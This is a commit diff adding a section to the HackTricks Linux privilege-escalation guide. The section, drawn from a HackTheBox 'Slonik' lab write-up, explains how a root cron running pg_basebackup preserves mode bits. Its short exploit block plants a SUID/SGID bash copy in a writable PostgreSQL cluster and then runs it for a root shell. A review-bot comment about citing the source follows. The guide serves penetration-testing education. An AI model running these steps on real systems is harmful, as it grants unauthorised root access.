
Commit d40017b

Merge pull request #1890 from HackTricks-wiki/update_HTB__Slonik_20260212_190614
HTB Slonik
2 parents 5d11636 + 92349c3 commit d40017b

1 file changed

Lines changed: 24 additions & 0 deletions

File tree

  • src/linux-hardening/privilege-escalation

src/linux-hardening/privilege-escalation/README.md

Lines changed: 24 additions & 0 deletions
@@ -559,6 +559,29 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
559559

560560
**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts).
561561

562+
### Root backups that preserve attacker-set mode bits (pg_basebackup)
563+
564+
If a root-owned cron wraps `pg_basebackup` (or any recursive copy) against a database directory you can write to, you can plant a **SUID/SGID binary** that will be recopied as **root:root** with the same mode bits into the backup output.
565+
566+
Typical discovery flow (as a low-priv DB user):
567+
- Use `pspy` to spot a root cron calling something like `/usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/` every minute.
568+
- Confirm the source cluster (e.g., `/var/lib/postgresql/14/main`) is writable by you and the destination (`/opt/backups/current`) becomes owned by root after the job.
569+
570+
Exploit:
571+
572+
```bash
573+
# As the DB service user owning the cluster directory
574+
cd /var/lib/postgresql/14/main
575+
cp /bin/bash .
576+
chmod 6777 bash
577+
578+
# Wait for the next root backup run (pg_basebackup preserves permissions)
579+
ls -l /opt/backups/current/bash # expect -rwsrwsrwx 1 root root ... bash
580+
/opt/backups/current/bash -p # root shell without dropping privileges
581+
```
582+
583+
This works because `pg_basebackup` preserves file mode bits when copying the cluster; when invoked by root the destination files inherit **root ownership + attacker-chosen SUID/SGID**. Any similar privileged backup/copy routine that keeps permissions and writes into an executable location is vulnerable.
584+
562585
### Invisible cron jobs
563586

564587
It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char):
@@ -2132,6 +2155,7 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
21322155
- [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
21332156
- [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
21342157
- [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html)
2158+
- [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html)
21352159
- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
21362160
21372161
{{#include ../../banners/hacktricks-training.md}}
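Review bot: the new reference in 2158+ sits in date order among the other 0xdf entries, but nothing in the pg_basebackup section added earlier in this patch (562+ to 583+) points to it, so the source of that technique is only discoverable by scrolling to the reference list at the end of the file. Consider citing the Slonik writeup from the section itself (a short "see also" line after 583+) so the provenance travels with the text.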
